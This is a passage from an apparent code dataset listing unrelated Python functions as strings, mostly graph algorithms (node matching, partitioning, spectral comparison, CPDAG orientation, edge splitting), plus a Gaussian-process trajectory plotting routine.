{pprint.pformat(all_match_pairs, indent=4)}\")\n\n\n elif nbrs1 == nbrs2:\n logger.debug(f\"traversing converging branch\")\n match_pair[node1]=node2\n traversed+=[node1,node2]\n nbrs1=sorted(set(nbrs1)-set([node1,node2]))\n logger.debug(f\"all non traversed neighbours: {nbrs1}\")\n if len(nbrs1)==1:\n nbr1=nbr2=nbrs1[0]\n logger.debug(f\"keeping single converged branch inline {nbr1} {nbr2}\")\n compare_nodes(G,all_match_pairs,match_pair,traversed.copy(),nbr1,nbr2,ports_weight)\n else:\n for nbr1,nbr2 in combinations_with_replacement(nbrs1,2):\n logger.debug(f\"recursive call from converged branch {nbr1} {nbr2}\")\n if nbr1+'_'+nbr2 not in all_match_pairs.keys():\n new_pair={}\n compare_nodes(G,all_match_pairs,new_pair,traversed.copy(),nbr1,nbr2,ports_weight)\n #filtering multiple axis of symmetries with same block, ideally they should be handled by array generation\n if new_pair:\n all_match_pairs[nbr1+'_'+nbr2] = new_pair\n logger.debug(f\"updating match pairs: {pprint.pformat(all_match_pairs, indent=4)}\")\n\n\n elif compare_two_nodes(G,node1,node2,ports_weight):\n nbrs1 = sorted(set([nbr for nbr in nbrs1 if G.get_edge_data(node1, nbr)['weight'] !=2]))\n nbrs2 = sorted(set([nbr for nbr in nbrs2 if G.get_edge_data(node2, nbr)['weight'] !=2]))\n match_pair[node1]=node2\n traversed+=[node1,node2]\n logger.debug(f\"Traversing parallel branches from {node1},{node2} {nbrs1}, {nbrs2}\")\n nbrs1_wt = [G.get_edge_data(node1, nbr)['weight'] for nbr in nbrs1]\n nbrs2_wt = [G.get_edge_data(node2, nbr)['weight'] for nbr in nbrs2]\n unique_match=find_unique_matching_branches(G,nbrs1,nbrs2,ports_weight)\n if len(nbrs1)==0 or len(nbrs2)==0:\n logger.debug(f\"no new SD neihbours, returning recursion {match_pair}\")\n elif len(nbrs1) ==1 and len(nbrs2)==1:\n logger.debug(f\"traversing binary branch\")\n compare_nodes(G,all_match_pairs,match_pair,traversed,nbrs1.pop(),nbrs2.pop(),ports_weight)\n elif unique_match:\n logger.debug(f'traversing unique matches {unique_match}')\n match_pair[node1]=node2\n traversed+=[node1,node2]\n for nbr1,nbr2 in unique_match.items():\n logger.debug(f\"recursive call from binary {node1}:{node2} to {nbr1}:{nbr2}\")\n compare_nodes(G,all_match_pairs,match_pair,traversed.copy(),nbr1,nbr2,ports_weight)\n elif len(nbrs1_wt)>len(set(nbrs1_wt))>1 and len(nbrs2_wt)>len(set(nbrs2_wt))>1:\n logger.debug(f\"setting new start points {node1} {node2}\")\n match_pair[node1]=node2\n if \"start_point\" in match_pair.keys():\n match_pair[\"start_point\"]+=[node1,node2]\n else:\n match_pair[\"start_point\"]=[node1,node2]\n else:\n match_pair = {}\n logger.debug(f\"end all traversal from binary branch {node1} {node2}\")\n\n else:\n match_pair = {}\n logger.debug(f\"end of recursion branch, matches {match_pair}\")",
"def _match_identical_nodes(self):\n\n for job_name_b in self._topo_b_nodes:\n for job_name_a in self._unresolved_a_nodes:\n if self._is_node_identical(job_name_a, job_name_b):\n self._identical_nodes[job_name_b] = job_name_a\n self._unresolved_a_nodes.remove(job_name_a)\n self._unresolved_b_nodes.remove(job_name_b)\n break",
"def mut_space(graph: nx.Graph) -> t.Iterator[t.Tuple[int, t.List[str]]]:\n genes = get_attr(graph, 'gene')\n xs = sorted(chain.from_iterable(((g.P1, g.A1), (g.P2, g.A2)) for g in genes))\n return ((g, sorted(set(x[1] for x in gg))) for g, gg in groupby(xs, key=op.itemgetter(0)))",
"def __get_merge_nodelist(induced_ordering):\n duplicate = list(induced_ordering) # create a copy of the list containing the induced ordering\n return {duplicate.pop(), duplicate.pop()} # return the vertices corresponding to the s-t cut",
"def better_partition(graph, part1, part2, independent_set_extraction_strategy):\n\n # TODO: When there are more hyperplanes it often chooses the resulting partition\n # TODO: as best even though it results in more colors (e.g. for DSJC 125.5)\n\n if part2 is None or len(part2) == 0:\n return True\n\n if part1 is None or len(part1) == 0:\n return False\n\n # Remove colors from one endpoint of each illegal edge in each partition.\n nodes_to_delete1 = nodes_to_delete(graph, part1, strategy=independent_set_extraction_strategy)\n nodes_to_color1 = {n for n in graph.nodes() if n not in nodes_to_delete1}\n nr_of_colors1 = len(set(part1.values()))\n\n nodes_to_delete2 = nodes_to_delete(graph, part2, strategy=independent_set_extraction_strategy)\n nodes_to_color2 = {n for n in graph.nodes() if n not in nodes_to_delete2}\n nr_of_colors2 = len(set(part2.values()))\n\n avg1 = float(len(nodes_to_color1)) / nr_of_colors1\n avg2 = float(len(nodes_to_color2)) / nr_of_colors2\n\n return avg1 > avg2",
"def CompareGraphsSpectrum(graph1, graph2):\n laplacian1 = nx.spectrum.laplacian_spectrum(graph1)\n laplacian2 = nx.spectrum.laplacian_spectrum(graph2)\n k1 = select_k(laplacian1)\n k2 = select_k(laplacian2)\n # take the fewer dimensions to describe the result\n k = min(k1, k2)\n # the similarity is the sum of the eukleidian distance of the most\n # important nodes\n similarity = sum((laplacian1[:k] - laplacian2[:k])**2)\n return similarity",
"def line_graph_forbidden_subgraphs():\n from sage.graphs.all import Graph\n from sage.graphs.generators.basic import ClawGraph\n graphs = [ClawGraph()]\n\n graphs.append(Graph({\n 0: [1, 2, 3],\n 1: [2, 3],\n 4: [2],\n 5: [3]\n }))\n\n graphs.append(Graph({\n 0: [1, 2, 3, 4],\n 1: [2, 3, 4],\n 3: [4],\n 2: [5]\n }))\n\n graphs.append(Graph({\n 0: [1, 2, 3],\n 1: [2, 3],\n 4: [2, 3]\n }))\n\n graphs.append(Graph({\n 0: [1, 2, 3],\n 1: [2, 3],\n 4: [2],\n 5: [3, 4]\n }))\n\n graphs.append(Graph({\n 0: [1, 2, 3, 4],\n 1: [2, 3, 4],\n 3: [4],\n 5: [2, 0, 1]\n }))\n\n graphs.append(Graph({\n 5: [0, 1, 2, 3, 4],\n 0: [1, 4],\n 2: [1, 3],\n 3: [4]\n }))\n\n graphs.append(Graph({\n 1: [0, 2, 3, 4],\n 3: [0, 4],\n 2: [4, 5],\n 4: [5]\n }))\n\n graphs.append(Graph({\n 0: [1, 2, 3],\n 1: [2, 3, 4],\n 2: [3, 4],\n 3: [4]\n }))\n\n return graphs",
"def bipartite_sets(G):\n color=bipartite_color(G)\n X=set(n for n in color if color[n]==1)\n Y=set(n for n in color if color[n]==0)\n return (X,Y)",
"def setSplit (set1, set2):\n common = []\n rem1 = []\n rem2 = []\n for elem in set1:\n if elem in set2:\n common.append (elem)\n else:\n rem1.append (elem)\n for elem in set2:\n if elem in set1:\n pass\n else:\n rem2.append (elem)\n return rem1, common, rem2",
"def _pair_based_graph_cut(self, graph):\n for node in self._find_paired_nodes(graph):\n graph.remove_node(node)\n return",
"def node_diff(self):\n if self.input1 is None or self.input2 is None:\n raise Exception(\"Missing input: please run the populate() method first\")\n if self.node_dict1 is None or self.node_dict2 is None:\n self.make_node_dict()\n # Initialize dictonaries to keep track of the nodes in respnse 1 and response 2\n g1={}\n g2={}\n # Set to keep track of the union of all curie ids\n curie_set = set()\n for curie in self.node_dict1.keys():\n g1[curie] = {}\n # intersection is only in the g1 dictionary\n g1[curie]['intersection'] = set()\n # node section keeps track of node ids associated with each node i.e. \"n0\"\n g1[curie]['node'] = set()\n curie_set.add(curie)\n for curie in self.node_dict2.keys():\n g2[curie] = {}\n # node section keeps track of node ids associated with each node i.e. \"n0\"\n g2[curie]['node'] = set()\n curie_set.add(curie)\n node_names1 = []\n node_names2 = []\n\n # extract all node ids (i.e. \"n0\",\"n1\",ect...)\n if len(self.input1['question_graph']['nodes'])>0:\n if 'id' in self.input1['question_graph']['nodes'][0]:\n node_names1 = [x['id'] for x in self.input1['question_graph']['nodes']]\n elif 'node_id' in self.input1['question_graph']['nodes'][0]:\n node_names1 = [x['node_id'] for x in self.input1['question_graph']['nodes']]\n if len(self.input2['question_graph']['nodes'])>0:\n if 'id' in self.input2['question_graph']['nodes'][0]:\n node_names2 = [x['id'] for x in self.input2['question_graph']['nodes']]\n elif 'node_id' in self.input2['question_graph']['nodes'][0]:\n node_names2 = [x['node_id'] for x in self.input2['question_graph']['nodes']]\n \n # initialize the result dictonary\n diff_dict = {}\n diff_dict[\"-1|-1\"] = {'intersection':[],'g1-g2':[],'g2-g1':[]}\n # initialize node id tuple keys\n for id1 in node_names1:\n for id2 in node_names2:\n diff_dict[id1+\"|\"+id2] = {'intersection':[],'g1-g2':[],'g2-g1':[]}\n # iterate through answers\n for answer1 in self.input1['answers']:\n for answer2 in self.input2['answers']:\n for id1 in answer1['node_bindings'].keys():\n # This is to handle cases where answer node id has a list or a string\n if isinstance(answer1['node_bindings'][id1], str):\n bindings1 = [answer1['node_bindings'][id1]]\n elif isinstance(answer1['node_bindings'][id1], list):\n bindings1 = answer1['node_bindings'][id1]\n for curie1 in bindings1:\n # store node id\n g1[curie1]['node'].add(id1)\n for id2 in answer2['node_bindings'].keys():\n # This is to handle cases where answer node id has a list or a string\n if isinstance(answer2['node_bindings'][id2], str):\n bindings2 = [answer2['node_bindings'][id2]]\n elif isinstance(answer2['node_bindings'][id2], list):\n bindings2 = answer2['node_bindings'][id2]\n for curie2 in bindings2:\n # store node id\n g2[curie2]['node'].add(id2)\n if curie1 == curie2:\n # stor intersection tuple\n g1[curie1]['intersection'].add(id1+\"|\"+id2)\n # iterate through all curies\n for curie in curie_set:\n # check if curie is from answer 1\n if curie in g1.keys():\n # check if in intersection\n if len(g1[curie]['intersection'])>0:\n diff_dict[\"-1|-1\"]['intersection'] += [self.node_dict1[curie]]\n for id1 in node_names1:\n for id2 in node_names2:\n node_tuple = id1+\"|\"+id2\n if id1 in g1[curie]['node'] and id2 in g2[curie]['node']:\n diff_dict[node_tuple]['intersection'] += [self.node_dict1[curie]]\n elif id1 in g1[curie]['node']:\n diff_dict[node_tuple]['g1-g2'] += [self.node_dict1[curie]]\n elif id2 in g2[curie]['node']:\n diff_dict[node_tuple]['g2-g1'] += [self.node_dict1[curie]]\n # If not in intersection store in 
g1-g2\n else:\n diff_dict[\"-1|-1\"]['g1-g2'] += [self.node_dict1[curie]]\n for id1 in g1[curie]['node']:\n # iterate through all answer 2 ids\n for id2 in node_names2:\n diff_dict[id1+\"|\"+id2]['g1-g2'] += [self.node_dict1[curie]]\n # if not in g1 but in g2 then in g2-g1\n elif curie in g2.keys():\n diff_dict[\"-1|-1\"]['g2-g1'] += [self.node_dict2[curie]]\n for id2 in g2[curie]['node']:\n # iterate through all answer 1 ids\n for id1 in node_names1:\n diff_dict[id1+\"|\"+id2]['g2-g1'] += [self.node_dict2[curie]]\n return diff_dict",
"def estimate_cpdag(self,skel_graph, sep_set):\n dag = skel_graph.to_directed()\n node_ids = skel_graph.nodes()\n for (i, j) in combinations(node_ids, 2):\n adj_i = set(dag.successors(i))\n if j in adj_i:\n continue\n adj_j = set(dag.successors(j))\n if i in adj_j:\n continue\n if sep_set[i][j] is None:\n continue\n common_k = adj_i & adj_j\n for k in common_k:\n if k not in sep_set[i][j]:\n if dag.has_edge(k, i):\n _logger.debug('S: remove edge (%s, %s)' % (k, i))\n dag.remove_edge(k, i)\n if dag.has_edge(k, j):\n _logger.debug('S: remove edge (%s, %s)' % (k, j))\n dag.remove_edge(k, j)\n\n def _has_both_edges(dag, i, j):\n return dag.has_edge(i, j) and dag.has_edge(j, i)\n\n def _has_any_edge(dag, i, j):\n return dag.has_edge(i, j) or dag.has_edge(j, i)\n\n def _has_one_edge(dag, i, j):\n return ((dag.has_edge(i, j) and (not dag.has_edge(j, i))) or\n (not dag.has_edge(i, j)) and dag.has_edge(j, i))\n\n def _has_no_edge(dag, i, j):\n return (not dag.has_edge(i, j)) and (not dag.has_edge(j, i))\n\n # For all the combination of nodes i and j, apply the following\n # rules.\n old_dag = dag.copy()\n while True:\n for (i, j) in combinations(node_ids, 2):\n # Rule 1: Orient i-j into i->j whenever there is an arrow k->i\n # such that k and j are nonadjacent.\n #\n # Check if i-j.\n if _has_both_edges(dag, i, j):\n # Look all the predecessors of i.\n for k in dag.predecessors(i):\n # Skip if there is an arrow i->k.\n if dag.has_edge(i, k):\n continue\n # Skip if k and j are adjacent.\n if _has_any_edge(dag, k, j):\n continue\n # Make i-j into i->j\n _logger.debug('R1: remove edge (%s, %s)' % (j, i))\n dag.remove_edge(j, i)\n break\n\n # Rule 2: Orient i-j into i->j whenever there is a chain\n # i->k->j.\n #\n # Check if i-j.\n if _has_both_edges(dag, i, j):\n # Find nodes k where k is i->k.\n succs_i = set()\n for k in dag.successors(i):\n if not dag.has_edge(k, i):\n succs_i.add(k)\n # Find nodes j where j is k->j.\n preds_j = set()\n for k in dag.predecessors(j):\n if not dag.has_edge(j, k):\n preds_j.add(k)\n # Check if there is any node k where i->k->j.\n if len(succs_i & preds_j) > 0:\n # Make i-j into i->j\n _logger.debug('R2: remove edge (%s, %s)' % (j, i))\n dag.remove_edge(j, i)\n\n # Rule 3: Orient i-j into i->j whenever there are two chains\n # i-k->j and i-l->j such that k and l are nonadjacent.\n #\n # Check if i-j.\n if _has_both_edges(dag, i, j):\n # Find nodes k where i-k.\n adj_i = set()\n for k in dag.successors(i):\n if dag.has_edge(k, i):\n adj_i.add(k)\n # For all the pairs of nodes in adj_i,\n for (k, l) in combinations(adj_i, 2):\n # Skip if k and l are adjacent.\n if _has_any_edge(dag, k, l):\n continue\n # Skip if not k->j.\n if dag.has_edge(j, k) or (not dag.has_edge(k, j)):\n continue\n # Skip if not l->j.\n if dag.has_edge(j, l) or (not dag.has_edge(l, j)):\n continue\n # Make i-j into i->j.\n _logger.debug('R3: remove edge (%s, %s)' % (j, i))\n dag.remove_edge(j, i)\n break\n\n # Rule 4: Orient i-j into i->j whenever there are two chains\n # i-k->l and k->l->j such that k and j are nonadjacent.\n #\n # However, this rule is not necessary when the PC-algorithm\n # is used to estimate a DAG.\n\n if nx.is_isomorphic(dag, old_dag):\n break\n old_dag = dag.copy()\n\n return dag",
"def cleanGraph(self,graph):\n i=0\n while i+1<len(graph):\n if self.getDistance(graph[i],graph[i+1])==0:\n del graph[i+1]\n else:\n i+=1\n return graph",
"def test_groups():\n graph = Graph()\n for one, two in [(1, 2), (2, 3), (1, 4), (4, 3), (3, 1)]:\n graph.add_edge(one, two)\n groups = graph.group()\n eq_(len(groups), 3)",
"def split_edges(self, maximum_distance):\n \"\"\" Iterate through the vertices of each section. For each vertex v, evaluate edges for which v is a source.\n If an edge of weight greater than maximum_distance, then split it. \"\"\"\n for section_id in self.sections:\n utils.print_progress(len(self.sections), prefix='splitting edges')\n current_section = [] # Need to update the section data after splitting the edges.\n for source in self.sections[section_id]:\n current_section.append(source)\n edges_to_remove = [] # If an edge is split, it will need to be removed.\n for edge in self.graph.get_out_edges(source):\n if self.edge_weights[edge] > maximum_distance:\n target = edge[1] # edge is a numpy array of [source, target, edge]. Select target.\n edges_to_remove.append(self.graph.edge(edge[0], edge[\n 1])) # If an edge is split, the original edge should be removed.\n\n new_edge_count = int(math.ceil(self.edge_weights[edge] / maximum_distance))\n new_edge_distance = self.edge_weights[edge] / new_edge_count\n current_point = shapes.Point.from_list(\n list(self.node_locations[source]) + [self.node_heading[target]])\n previous_vertex = source\n for _ in range(new_edge_count):\n current_point = utils.offset_point(current_point, new_edge_distance, current_point.bearing)\n current_vertex = self.graph.add_vertex()\n current_section.append(current_vertex) # The new vertex becomes a part of the section.\n \"\"\" Populate the property map for the new vertex. Inherit values from the target node,\n unless the target node is a junction node. Then inherit values from the source. \"\"\"\n self.node_locations[current_vertex] = current_point.as_list()\n self.node_heading[current_vertex] = current_point.bearing\n property_vertex = source if not self.junctions[target] else target\n self.node_speed_limit[current_vertex] = self.node_speed_limit[property_vertex]\n self.node_width[current_vertex] = self.node_width[property_vertex]\n self.node_id[current_vertex] = self.node_id[property_vertex]\n\n \"\"\" Create an edge between the previous vertex and the newly created vertex, \n and update the edge weight property map. \"\"\"\n current_edge = self.graph.add_edge(previous_vertex, current_vertex)\n self.edge_weights[current_edge] = new_edge_distance\n\n # The current vertex becomes the previous vertex in the next step.\n previous_vertex = current_vertex\n\n \"\"\" Create an edge between the last new vertex that was created and the target of the\n original edge which is being split, and update the property map. \"\"\"\n self.edge_weights[self.graph.add_edge(previous_vertex, target)] = new_edge_distance\n list(map(self.graph.remove_edge, edges_to_remove)) # Remove all relevant edges\n self.sections[section_id] = current_section # Update the section with the new vertices",
"def permute_graphs(a, b, seed=0):\n np.random.seed(seed)\n nodes = b.nodes()\n permuted_nodes = np.random.permutation(nodes)\n\n # matching of all labels of nodes in graph b to their new values\n match = gm.Matching(zip(nodes, permuted_nodes))\n new_edges = [(match.get_b(x), match.get_b(y)) for x, y in b.edges()]\n permuted_edges = [(x, y) for x, y in np.random.permutation(new_edges)]\n unneeded_nodes = set(nodes).difference(set(a.nodes()))\n for node in unneeded_nodes:\n match.pop_b(node)\n name = \"permuted_b(%s, %s, %s)\" % (\n a.name if a.name else hash(a), b.name if b.name else hash(b), seed)\n return a, nx.Graph(permuted_edges, name=name), match",
"def shareNoEdges(segment,neighbours,segmentsMeta):\n return np.fromiter(map(lambda x : haveNoSameEdges(segment,x,segmentsMeta),neighbours),np.bool)",
"def is_partition(graph, nodeset1, nodeset2):\n if len(nodeset1) < 1:\n return False\n if len(nodeset2) < 1:\n return False\n if(len(nodeset1.intersection(nodeset2)) > 0):\n return False\n return_list = []\n return_list2 = []\n for element in nodeset1:\n return_list.append(element)\n for element in nodeset2:\n return_list2.append(element)\n index = 0\n while index < len(return_list):\n for element in graph.get_node_neighbors(return_list[index]):\n if element not in return_list:\n return_list.append(element)\n index += 1\n index = 0\n while index < len(return_list2):\n for element in graph.get_node_neighbors(return_list2[index]):\n if element not in return_list2:\n return_list2.append(element)\n index += 1\n return len(set(return_list).intersection(set(return_list2))) < 1",
"def clean_edges(self):",
"def _find_unpaired_regions(self, graph, adjacency):\n graph_c = graph.copy()\n unpaired_nodes_list = []\n self._pair_based_graph_cut(graph_c)\n for component in nx.connected_components(graph_c):\n if len(component) >= adjacency:\n unpaired_nodes_list = unpaired_nodes_list + component\n return unpaired_nodes_list",
"def test_consistent_ids(self) -> None:\n bnode = BNode()\n g0_ts: _TripleSet = {\n (bnode, FOAF.name, Literal(\"Golan Trevize\")),\n (bnode, RDF.type, FOAF.Person),\n }\n bnode = BNode()\n g1_ts: _TripleSet = {\n (bnode, FOAF.name, Literal(\"Janov Pelorat\")),\n (bnode, RDF.type, FOAF.Person),\n }\n\n g0 = Graph()\n g0 += g0_ts\n cg0 = to_canonical_graph(g0)\n cg0_ts = GraphHelper.triple_set(cg0)\n\n g1 = Graph()\n g1 += g1_ts\n cg1 = to_canonical_graph(g1)\n cg1_ts = GraphHelper.triple_set(cg1)\n\n assert cg0_ts.issubset(\n cg1_ts\n ), \"canonical triple set cg0_ts should be a subset of canonical triple set cg1_ts\"",
"def construct_graph(a, b, w, time_arr, imp_arr, cost_arr, dist_arr):\n graph = {}\n for index,nodes in enumerate(zip(a,b)):\n # add unadded nodes to graph's keys with empty list\n if nodes[0] not in graph.keys():\n graph[nodes[0]] = []\n if nodes[1] not in graph.keys():\n graph[nodes[1]] = []\n # add unadded destination nodes as list [dest, weight]\n if nodes[1] not in graph[nodes[0]]:\n graph[nodes[0]].append([nodes[1], w[index], time_arr[index], imp_arr[index], cost_arr[index], dist_arr[index]])\n if nodes[0] not in graph[nodes[1]]:\n graph[nodes[1]].append([nodes[0], w[index], time_arr[index], imp_arr[index], cost_arr[index], dist_arr[index]])\n return graph",
"def report_graph_plotter(trajectory1, trajectory2, n_split, n_length, fraction, length):\r\n\r\n X, Y = GPy_get_X(trajectory1, keep_length=False, output_dim=3, length = length)\r\n Xprime, Yprime = GPy_get_X(trajectory2, keep_length=False, output_dim=3, length= length)\r\n\r\n # n_split = int(np.floor(np.shape(trajectory1)[-1]/2))\r\n # n_length = 3\r\n\r\n Y1, Y2, Y_mask = trajectory_splitter(trajectory1, n_split, n_length)\r\n Y1prime, Y2prime, Yprime_mask = trajectory_splitter(trajectory2, n_split, n_length)\r\n X1, X2, X_mask = trajectory_splitter(X.T, n_split, n_length)\r\n X1prime, X2prime, Xprime_mask = trajectory_splitter(X.T, n_split, n_length)\r\n X1, X2, X_mask = X1.T, X2.T, X_mask.T\r\n X1prime, X2prime, Xprime_mask = X1prime.T, X2prime.T, Xprime_mask.T\r\n\r\n throwaway1, GP1 = multi_dimensional_gaussian_plotter(Y1, extension_ratio=0., length=n_split*0.01/fraction, n_dimensions=3, fraction=1.)\r\n throwaway2, GP2 = multi_dimensional_gaussian_plotter(Y1prime, extension_ratio=0., length=n_split*0.01/fraction, n_dimensions=3, fraction=1.)\r\n\r\n # assert((intermediate1 == X1).all())\r\n # assert((intermediate2 == X1prime).all())\r\n\r\n Y1 = Y1[None, :, :] # treating each trajectory fragment as a separate bird.\r\n Y2 = Y2[None, :, :]\r\n Y1prime = Y1[None, :, :]\r\n Y2prime = Y2prime[None, :, :]\r\n # Y_mask = Y_mask[None, :, :]\r\n # Yprime_mask = Yprime_mask[None, :, :]\r\n\r\n # trajectories = np.ma.concatenate((Y_mask,Yprime_mask), axis=0)\r\n # print(f'The shape of the trajectories before is [2,{np.shape(trajectory1)}]\\nThe shape of Y_mask is {np.shape(Y_mask)}\\nThe shape of trajectories is {np.shape(trajectories)}')\r\n\r\n fig = plt.figure(figsize=(9.,4.))\r\n outer_grid = gridspec.GridSpec(1, 2, figure=fig, left=0.1, right=0.975,top=0.975, wspace=0.3)\r\n\r\n left_cell = gridspec.GridSpecFromSubplotSpec(1, 1, subplot_spec=outer_grid[0])\r\n\r\n ax = fig.add_subplot(left_cell[:, :])\r\n right_cell = outer_grid[1].subgridspec(5, 3, hspace=0.05)\r\n upper_right_cell = gridspec.GridSpecFromSubplotSpec(3, 1, subplot_spec=right_cell[:3, :], hspace=0.0)\r\n lower_right_cell = gridspec.GridSpecFromSubplotSpec(2, 1, subplot_spec=right_cell[3:, :], hspace=0.0)\r\n # upper_right_cell = right_Cell[:3, :].subgridspec(3, 1)\r\n # lower_right_cell = right_Cell[3:, :].subgridspec(2, 1)\r\n\r\n # axx = fig.add_subplot(right_cell[0, :])\r\n # axy = fig.add_subplot(right_cell[1, :])\r\n # axz = fig.add_subplot(right_cell[2, :])\r\n # ax2 = fig.add_subplot(right_cell[3, :])\r\n # ax3 = fig.add_subplot(right_cell[4, :])\r\n axx = fig.add_subplot(upper_right_cell[0])\r\n axy = fig.add_subplot(upper_right_cell[1], sharex=axx)\r\n axz = fig.add_subplot(upper_right_cell[2], sharex=axx)\r\n ax2 = fig.add_subplot(lower_right_cell[0], sharex=axx)\r\n ax3 = fig.add_subplot(lower_right_cell[1], sharex=axx)\r\n\r\n\r\n ax.set_xlabel('Z')\r\n ax.set_ylabel('Y')\r\n\r\n ax.plot(Y_mask[2,:],Y_mask[1,:], 'k-')\r\n ax.plot(Yprime_mask[2, :], Yprime_mask[1, :], 'b-')\r\n\r\n\r\n # inverse_mask = ~np.array(np.ma.getmask(Y_mask), dtype=bool)\r\n # Y_no_mask = np.ma.masked_array(Y_mask, ~np.ma.getmask(Y_mask))\r\n # Yprime_no_mask = np.ma.masked_array(Yprime_mask, ~np.ma.getmask(Yprime_mask))\r\n # ax.plot(Y_no_mask[2,:],Y_no_mask[1,:], 'k--')\r\n # ax.plot(Yprime_no_mask[2, :], Yprime_no_mask[1, :], 'b--')\r\n\r\n\r\n axins = ax.inset_axes([0.175, 0.15, 0.375, 0.35])\r\n axins.plot(Yprime_mask[2, :], Yprime_mask[0, :], 'b-')\r\n axins.plot(Y_mask[2,:],Y_mask[0,:], 'k-')\r\n # axins.plot(Yprime_no_mask[2, 
:], Yprime_no_mask[0, :], 'b--')\r\n # axins.plot(Y_no_mask[2,:],Y_no_mask[0,:], 'k--')\r\n axins.set_xlabel('Z')\r\n axins.set_ylabel('X')\r\n\r\n Y_mask.mask = np.ma.nomask\r\n Yprime_mask.mask = np.ma.nomask\r\n ax.plot(Y_mask[2,:],Y_mask[1,:], 'k:')\r\n ax.plot(Yprime_mask[2, :], Yprime_mask[1, :], 'b:')\r\n axins.plot(Yprime_mask[2, :], Yprime_mask[0, :], 'b:')\r\n axins.plot(Y_mask[2,:],Y_mask[0,:], 'k:')\r\n\r\n ax.tick_params(axis=\"both\", direction=\"in\", bottom=True, top=True, left=True, right=True)\r\n axins.tick_params(axis=\"both\", direction=\"in\", bottom=True, top=True, left=True, right=True)\r\n\r\n axx.tick_params(axis=\"both\", direction=\"in\", bottom=True, top=True, left=True, right=True)\r\n axy.tick_params(axis=\"both\", direction=\"in\", bottom=True, top=True, left=True, right=True)\r\n axz.tick_params(axis=\"both\", direction=\"in\", bottom=True, top=True, left=True, right=True)\r\n ax2.tick_params(axis=\"both\", direction=\"in\", bottom=True, top=True, left=True, right=True)\r\n ax3.tick_params(axis=\"both\", direction=\"in\", bottom=True, top=True, left=True, right=True)\r\n ax2.tick_params(axis=\"both\", labelbottom=False)\r\n axx.tick_params(axis=\"both\", labelbottom=False)\r\n axy.tick_params(axis=\"both\", labelbottom=False)\r\n axz.tick_params(axis=\"both\", labelbottom=False)\r\n\r\n X_list = [X1, X1, X1]\r\n Xprime_list = [X1prime, X1prime, X1prime]\r\n slices = GPy.util.multioutput.get_slices(X_list)\r\n slicesprime = GPy.util.multioutput.get_slices(Xprime_list)\r\n assert((slices == slicesprime))\r\n\r\n axx.set_ylabel('X')\r\n axy.set_ylabel('Y')\r\n axz.set_ylabel('Z')\r\n ax3.set_xlabel('Time')\r\n ax3.set_ylabel('Incorrect\\nMatching')\r\n ax2.set_ylabel('Correct\\nMatching')\r\n\r\n xlim = [(n_split+n_length)*0.01/fraction + 0.1, length] # Can't be bothered to do the maths to work out why the 0.1 works. 
multiply by 0.01 for the timesteps.divid by fraction for beginning.\r\n ax2.set_xlim(xlim)\r\n # ax2.set_ylim(-4,3.5)\r\n # ax3.set_ylim(-11,15)\r\n # ax3.set_xlim(xlim)\r\n\r\n # GP1.plot(plot_limits=xlim, ax=axx, fixed_inputs=[(1, 0)], which_data_rows=slices[0], legend=False, marker='+')\r\n # GP1.plot(plot_limits=xlim, ax=axy, fixed_inputs=[(1, 1)], which_data_rows=slices[1], legend=False, marker='+')\r\n # GP1.plot(plot_limits=xlim, ax=axz, fixed_inputs=[(1, 2)], which_data_rows=slices[2], legend=False, marker='+')\r\n # GP2.plot(plot_limits=xlim, ax=axx, fixed_inputs=[(1, 0)], which_data_rows=slicesprime[0], legend=False, marker='+')\r\n # GP2.plot(plot_limits=xlim, ax=axy, fixed_inputs=[(1, 1)], which_data_rows=slicesprime[1], legend=False, marker='+')\r\n # GP2.plot(plot_limits=xlim, ax=axz, fixed_inputs=[(1, 2)], which_data_rows=slicesprime[2], legend=False, marker='+')\r\n\r\n\r\n num_samples = 5\r\n\r\n Xnewx = np.concatenate((X2, np.ones_like(X2)-1), axis=1)\r\n noise_dict = {'output_index': Xnewx[:, 1:].astype(int)}\r\n Xpred, Xvar = GP1.predict(Xnewx,Y_metadata=noise_dict)\r\n Xnewx = np.concatenate((X2, np.ones_like(X2)-1), axis=1)\r\n noise_dict = {'output_index': Xnewx[:, 1:].astype(int)}\r\n Xpred_prime, Xprime_var = GP2.predict(Xnewx,Y_metadata=noise_dict)\r\n Xquantiles = np.array(GP1.predict_quantiles(Xnewx,Y_metadata=noise_dict))\r\n Xsamples = GP1.posterior_samples(Xnewx, Y_metadata=noise_dict, size=num_samples)\r\n Xprime_quantiles = np.array(GP2.predict_quantiles(Xnewx,Y_metadata=noise_dict))\r\n Xprime_samples = GP2.posterior_samples(Xnewx, Y_metadata=noise_dict, size=num_samples)\r\n\r\n Ynewx = np.concatenate((X2, np.ones_like(X2)), axis=1)\r\n noise_dict = {'output_index': Ynewx[:, 1:].astype(int)}\r\n Ypred, Yvar = GP1.predict(Ynewx,Y_metadata=noise_dict)\r\n Ynewx = np.concatenate((X2, np.ones_like(X2)), axis=1)\r\n noise_dict = {'output_index': Ynewx[:, 1:].astype(int)}\r\n Ypred_prime, Yprime_var = GP2.predict(Ynewx,Y_metadata=noise_dict)\r\n Yquantiles = np.array(GP1.predict_quantiles(Ynewx,Y_metadata=noise_dict))\r\n Ysamples = GP1.posterior_samples(Ynewx, Y_metadata=noise_dict, size=num_samples)\r\n Yprime_quantiles = np.array(GP2.predict_quantiles(Ynewx,Y_metadata=noise_dict))\r\n Yprime_samples = GP2.posterior_samples(Ynewx, Y_metadata=noise_dict, size=num_samples)\r\n\r\n\r\n Znewx = np.concatenate((X2, np.ones_like(X2)+1), axis=1)\r\n noise_dict = {'output_index': Znewx[:, 1:].astype(int)}\r\n Zpred, Zvar = GP1.predict(Znewx,Y_metadata=noise_dict)\r\n Znewx = np.concatenate((X2, np.ones_like(X2)+1), axis=1)\r\n noise_dict = {'output_index': Znewx[:, 1:].astype(int)}\r\n Zpred_prime, Zprime_var = GP2.predict(Znewx,Y_metadata=noise_dict)\r\n Zquantiles = np.array(GP1.predict_quantiles(Znewx,Y_metadata=noise_dict))\r\n Zsamples = GP1.posterior_samples(Znewx, Y_metadata=noise_dict, size=num_samples)\r\n Zprime_quantiles = np.array(GP2.predict_quantiles(Znewx,Y_metadata=noise_dict))\r\n Zprime_samples = GP2.posterior_samples(Znewx, Y_metadata=noise_dict, size=num_samples)\r\n\r\n\r\n # axx.fill_between(x=Xnewx[:, 0], y1=Xquantiles[0, :, 0], y2=Xquantiles[1, :, 0], color='black', alpha=0.05)\r\n # axx.fill_between(x=Xnewx[:, 0], y1=Xprime_quantiles[0, :, 0], y2=Xprime_quantiles[1, :, 0], color='blue', alpha=0.05)\r\n # axy.fill_between(x=Xnewx[:, 0], y1=Yquantiles[0, :, 0], 